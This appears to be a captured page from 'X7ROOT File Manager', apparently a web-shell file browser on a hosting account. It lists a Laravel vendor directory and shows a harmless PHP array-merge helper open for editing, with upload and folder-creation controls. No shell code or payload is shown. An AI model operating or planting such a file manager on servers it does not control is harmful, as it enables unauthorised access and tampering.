X7ROOT File Manager
Current Path:
/home/prisjneg/public_html/vendor/spatie/flare-client-php/src
home
/
prisjneg
/
public_html
/
vendor
/
spatie
/
flare-client-php
/
src
/
📁
..
📄
Api.php
(1.82 KB)
📁
Concerns
📁
Context
📁
Contracts
📁
Enums
📄
Flare.php
(12.95 KB)
📁
FlareMiddleware
📄
Frame.php
(753 B)
📁
Glows
📁
Http
📄
Report.php
(11.77 KB)
📁
Solutions
📁
Support
📁
Time
📁
Truncation
📄
View.php
(1.41 KB)
📄
helpers.php
(678 B)
Editing: helpers.php
<?php if (! function_exists('array_merge_recursive_distinct')) { /** * @param array<int|string, mixed> $array1 * @param array<int|string, mixed> $array2 * * @return array<int|string, mixed> */ function array_merge_recursive_distinct(array &$array1, array &$array2): array { $merged = $array1; foreach ($array2 as $key => &$value) { if (is_array($value) && isset($merged[$key]) && is_array($merged[$key])) { $merged[$key] = array_merge_recursive_distinct($merged[$key], $value); } else { $merged[$key] = $value; } } return $merged; } }
Upload File
Create Folder